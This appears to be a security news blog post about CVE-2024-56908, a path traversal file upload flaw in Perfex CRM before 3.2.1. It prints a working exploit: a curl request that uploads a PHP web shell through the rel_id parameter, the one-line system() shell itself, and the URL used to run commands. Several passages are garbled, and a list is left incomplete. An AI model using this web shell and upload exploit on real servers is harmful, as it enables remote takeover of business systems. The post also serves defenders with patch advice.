CVE CyberSecurity Database News

CVE-2024-56908 - How a File Upload Vulnerability in Perfex CRM < 3.2.1 Can Let Attackers Take Over Your Server

Poster -

In June 2024, a severe security flaw—CVE-2024-56908—was discovered in the popular open-source Perfex CRM software. This vulnerability is a classic case of improper input validation, making it possible for an attacker with basic credentials to upload malicious files to arbitrary locations on the server, leading to remote code execution (RCE). Any business running versions below 3.2.1 is potentially at high risk.

In this post, we’ll break down the bug’s mechanics in simple terms, show you sample exploit code, and equip you with the essential references to help you protect your platform.

What Is Perfex CRM?

Perfex CRM is a widely-used customer relationship management solution built with PHP. It offers features for project management, invoicing, lead tracking, and more, making it a favorite for small-to-medium businesses globally.

What Is CVE-2024-56908?

CVE-2024-56908 is a vulnerability in Perfex CRM versions before 3.2.1 that lets authenticated users abuse the upload_sales_file endpoint to:

Even achieve remote code execution (RCE).

The root cause is lack of proper input validation—specifically, the server takes user-supplied input (via the rel_id parameter) and uses it to determine the upload directory, without stringent checks.

Perfex CRM, like many web apps, allows sales files to be uploaded. The relevant endpoint

POST /sales/upload_sales_file

The request is authenticated but nothing fancy is needed: you just need a regular user account.

The rel_id parameter, expected to be a sales record ID, gets used directly to build the path where a file is saved—without cleaning.

Attackers can trick the system like this

- Instead of sending a normal rel_id like 1234, they supply something like ../../../../public_html/shell.

Combine this with a .php file upload.

- The server saves the file exactly where the attacker asks. If web server executes files from that directory, game over.

Here’s an example using curl to upload a PHP web shell to the server root

curl -k -X POST 'https://target.site/sales/upload_sales_file'; \
-H 'Cookie: ci_session=YOUR_AUTH_COOKIE_HERE' \
-F 'rel_id=../../../../public_html' \
-F 'file=@shell.php'

Sample shell.php

<?php system($_GET['cmd']); ?>

After the upload, the file could be accessed at

https://target.site/shell.php?cmd=id

And you’ll see the result of running the id command on the server!

Here’s a (simplified) snippet of how the backend might be handling uploads

// Simplified example
$rel_id = $_POST['rel_id'];
$upload_dir = FCPATH . 'uploads/sales/' . $rel_id . '/';

if (!file_exists($upload_dir)) {
    mkdir($upload_dir, 0777, true);
}
move_uploaded_file($_FILES['file']['tmp_name'], $upload_dir . basename($_FILES['file']['name']));

No validation on $rel_id.

- Attackers use ../../../ to escape out of uploads/sales/ and write files wherever they want.

References & Original Disclosures

- CVE-2024-56908 on NVD
- Perfex CRM Official Site
- Security Advisory / Patch Notes

Take full control of the web server

All that’s needed is a low-privileged user account in the CRM. This makes it extra dangerous for companies with large user bases.

How to Fix

Upgrade your instance to version 3.2.1 or higher immediately. The patch properly sanitizes and restricts the rel_id parameter, closing the loophole.

Final Words

CVE-2024-56908 highlights how even minor server-side oversights can lead to catastrophic consequences. Always validate and sanitize user inputs—even if you think the endpoint is only reachable by “trusted” users.

Patch as soon as possible to keep your data safe!

*Like this deep dive? Follow for more practical breakdowns of the latest security flaws.*

Timeline

Published on: 02/13/2025 23:15:10 UTC
Last modified on: 03/17/2025 19:15:24 UTC